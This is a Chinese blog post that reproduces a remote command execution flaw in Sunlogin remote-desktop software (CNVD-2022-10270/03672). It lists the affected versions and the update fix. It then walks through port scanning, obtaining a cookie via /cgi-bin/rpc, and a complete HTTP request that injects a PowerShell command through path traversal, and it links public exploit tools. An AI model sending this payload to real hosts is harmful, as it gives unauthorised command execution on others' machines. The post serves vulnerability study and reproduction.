向日葵命令执行漏洞(CNVD-2022-10270/CNVD-2022-03672)复现

警告
本文最后更新于 2023-01-27,文中内容可能已过时。

漏洞影响的版本

向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12)

https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672

https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270

修复方式 更新向日葵

手工复现

环境搭建

感谢大爹热心为我提供的realworld环境

扫描端口

image-20220427205757344

nmap扫所有端口 一般是40000以上的端口号

尝试发现64221可以使用

image-20220427203231820

访问/cgi-bin/rpc

post传参

1
action=verify-haras

image-20220427203336124

得到cookie

使用burpsuite发包

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+whoami HTTP/1.1
Host: 192.168.31.106:64221
Proxy-Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/w
ebp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: CID=ciiHpsOHS1UtC5ZfZMrA1gApw9htv8ph
connection: close
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 4

image-20220427205718871

工具复现

扫描:https://github.com/mrknow001/Sunlogin-rce

rce利用:https://github.com/Mr-xn/sunlogin_rce

image-20220427205944135

image-20220427210010426

0%